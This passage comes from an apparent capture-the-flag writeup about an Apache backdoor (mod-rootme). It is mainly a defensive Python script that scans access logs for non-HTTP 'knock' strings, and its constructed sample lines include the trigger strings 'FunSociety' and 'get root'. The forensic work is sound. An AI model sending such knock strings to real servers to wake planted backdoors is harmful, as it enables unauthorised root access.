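The access-log entries above are the forensic artefact that gives this backdoor away: Apache cannot parse a bare word such as FunSociety as a request line, so it answers 400 and logs the raw string. The following Python script is an added example for the defensive side of this box, not code from the original writeup or from the mod-rootme project. It parses combined-format access-log lines, flags non-HTTP "knocks" (status 400 with a request field that is not `METHOD target HTTP/x.y`), separates them from ordinary 400 noise such as malformed URLs or TLS handshakes sent to the plaintext port, and counts repeated tokens so that a passphrase stands out. The sample log lines are constructed for the example and modelled on the ones shown above.

```python
import re
from collections import Counter

# Apache "combined" log format. The quoted request field holds whatever the client
# sent as its first line, so a non-HTTP knock ends up there verbatim.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A syntactically valid request line: METHOD SP request-target SP HTTP/x.y
REQUEST_LINE_RE = re.compile(r'^[A-Z]+ \S+ HTTP/\d\.\d$')
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample lines (not a real capture), modelled on the writeup's access log.
SAMPLE_LOG = [
    '10.10.14.3 - - [25/Dec/2017:13:10:01 -0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [25/Dec/2017:13:10:02 -0800] "GET /missing HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [25/Dec/2017:13:10:03 -0800] "GET /a%ZZ HTTP/1.1" 400 0 "-" "curl/7.58"',
    '10.10.14.3 - - [25/Dec/2017:13:10:04 -0800] "\\x16\\x03\\x01\\x02\\x00" 400 0 "-" "-"',
    '::1 - - [25/Dec/2017:13:11:04 -0800] "FunSociety" 400 0 "-" "-"',
    '::1 - - [25/Dec/2017:13:13:12 -0800] "FunSociety" 400 0 "-" "-"',
    '10.10.14.3 - - [25/Dec/2017:13:14:53 -0800] "FunSociety" 400 0 "-" "-"',
    '::1 - - [23/Dec/2017:14:39:17 -0800] "get root" 400 301 "-" "-"',
]


def parse_line(line):
    """Parse one access-log line into a dict; return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return a reason string if the entry looks like a non-HTTP knock, else None."""
    if entry["status"] != 400:
        return None                      # only unparseable request lines get a 400 with a bare token
    req = entry["request"]
    if REQUEST_LINE_RE.match(req):
        return None                      # valid request line (e.g. bad URL encoding): ordinary 400
    if not req or "\\x" in req:
        return None                      # binary junk (TLS to port 80, scanners): noisy, low value
    if entry["host"] in LOOPBACK:
        return "bare token from loopback (local testing of a backdoor?)"
    return "bare token instead of HTTP request line"


def find_knocks(lines):
    """Return [(host, request, reason)] for every line that classify() flags."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append((entry["host"], entry["request"], reason))
    return hits


def knock_tokens(lines):
    """Count each flagged request string: a token repeated across hosts is a passphrase candidate."""
    return Counter(req for _, req, _ in find_knocks(lines))


if __name__ == "__main__":
    for host, req, reason in find_knocks(SAMPLE_LOG):
        print(f"{host:12} {req!r:20} {reason}")
    print(knock_tokens(SAMPLE_LOG).most_common())
```

On a real host you would feed it `zcat -f /var/log/apache2/access.log*`; the loopback reason is the interesting one here, since legitimate clients rarely talk raw text to the local web server, whereas someone testing a freshly installed backdoor does exactly that.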
## **Conclusion**
Here we can see the progress graph :
![](img/8_graph.png)
